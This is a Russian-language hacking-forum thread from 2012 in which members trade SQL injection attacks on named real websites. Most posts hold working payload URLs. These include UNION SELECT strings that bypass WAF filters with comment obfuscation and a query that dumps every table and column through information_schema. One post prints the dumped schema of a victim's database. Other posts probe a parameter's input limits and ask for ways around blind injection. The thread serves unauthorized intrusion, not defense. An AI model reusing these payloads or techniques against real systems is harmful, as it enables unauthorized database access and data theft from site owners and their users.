Старый 06.06.2012, 14:44   #2081
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
http://shields-down.co.uk/market/index.php?id=SQL
Хитрый SQL фильтр, обойти как то можно?
Код:
http://www.shields-down.co.uk/market/wants/index.php?type=-10/*%28UnIon%29*/union/*%28select%29*/select+1,2,3,4,version%28%29%23
Nightmare, в этот раз без инклуда)
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 08.06.2012, 17:34   #2082
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

судя по всему какой-то гимор с ошибкой, а не скуля:

https://www.singlesolution.com/core/checkpostcode.php?postcode=100%27

имеем сообщение об ошибке с строкой запроса SELECT id FROM postcodes WHERE postcode_outcode='100''

собственно ошибку вызывают любые 3 значения передаваемые в параметр postcode с ковычкой

4 значения уже проходят без ошибки как с кавычкой, так и без

если передать запрос

https://www.singlesolution.com/core/checkpostcode.php?postcode=100'0

то вывалиться строка без полей :SELECT * FROM postcodes WHERE postcode_outcode='100''

собственно вопрос-предложение, поковыряйте, может еще что-то интересное получиться только не забудьте поделиться информацией
durito вне форума   Ответить с цитированием
Старый 08.06.2012, 20:54   #2083
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

durito,
как я понял, там ограничение на размер принимаемых данных.
https://www.singlesolution.com/core/checkpostcode.php?postcode=100' => ошибка
https://www.singlesolution.com/core/checkpostcode.php?postcode=1000' => ошибки нет

Т.e. четыре символа только хавает =(

P.S. Люди, не подскажeте, в какой таблице хранится пароли в Exchange от мелкомягких?
Ereeee вне форума   Ответить с цитированием
Старый 08.06.2012, 22:59   #2084
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

Ereeee 5 и более символов - ошибки нет
durito вне форума   Ответить с цитированием
Старый 09.06.2012, 09:54   #2085
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Ты не понял. B checkpostcode.php принимается значение переменной postcode через GET, потом берутся только первые 4 символа и эти символы попадают в запрос. Т.e. , по-моему, раскрутить нереально.
Ereeee вне форума   Ответить с цитированием
Старый 09.06.2012, 12:58   #2086
cat1vo
 
Аватар для cat1vo
 
Регистрация: 08.10.2010
Сообщений: 38
Репутация: 5
По умолчанию

Или как вариант поискать дырку в другом месте
Код:
http://www.singlesolution[dot]com/static/matching.html?id=13'+and+0+union+all+select+1,concat_ws(0x3a,user(),database(),version))--+
cat1vo вне форума   Ответить с цитированием
Старый 09.06.2012, 13:35   #2087
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

Flakt, cat1vo спасибо, но меня интересовал именно вот этот "безнадежный" вариант с checkpostcode.php
просто было интересно, что из него можно выжать
durito вне форума   Ответить с цитированием
Старый 09.06.2012, 14:13   #2088
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

У меня не менее интересный случай =)

http://muzmaika.com/showall.php
POST:name=A' order by 5--+1&ok=%CD%E0%E9%F2%E8

Цитата:
SELECT `id`,`zapros`,`count`,`id` FROM `search_log` WHERE `zapros` LIKE 'a' order by 5-- ' ORDER BY `id` ASC
ErrCode 4. DB script error: не могу выполнить запрос к БД!
POST:name=A' order by 5--+1&ok=%CD%E0%E9%F2%E8 ===> true
А если:
POST:name=A' union+select+1,2,3,4--+&ok=%CD%E0%E9%F2%E8
Уже ошибка:
Цитата:
SELECT `id`,`name`,`instock`,`visits`,`item_count`,`id` FROM `categories` WHERE (`instock`=1) AND `name` LIKE '%A' union select 1,2,3,4-- %' ORDER BY `name` ASC
ErrCode 4. DB script error: не могу выполнить запрос к БД!
Т.е. кол-во полей уже 6. Т.е. уже другой запрос. Без блайнд можно обойтись как-то?
Ereeee вне форума   Ответить с цитированием
Старый 09.06.2012, 18:49   #2089
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

http://www.heavymetal.com/index.php?id=SQL
Очередной фильтр, можно ли как то вывести инфу?
Nightmare вне форума   Ответить с цитированием
Старый 09.06.2012, 20:16   #2090
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
http://www.heavymetal.com/index.php?id=SQL
Очередной фильтр, можно ли как то вывести инфу?
Обычный WAF:
Код:
http://www.heavymetal.com/index.php?id=-1+/*!union*/+select+1,2,3,4,5,6,version(),8,9,10,11,12--+f
UPD. Обходи так:
Код:
http://www.heavymetal.com/index.php?id=-1+/*!union+select+1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+limit+0,1*/--+f
Вся БД:
Код:
http://www.heavymetal.com/index.php?id=-1+/*!union+select+1,2,3,4,5,6,(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x),8,9,10,11,12+from+information_schema.tables+limit+0,1*/--+f
Цитата:
heavym7_hmbs.archive:ID
heavym7_hmbs.archive:listID
heavym7_hmbs.archive:issueID
heavym7_hmbs.archive:date
heavym7_hmbs.archive:text
heavym7_hmbs.config:id
heavym7_hmbs.config:site_name
heavym7_hmbs.config:config_params
....
Ereeee вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot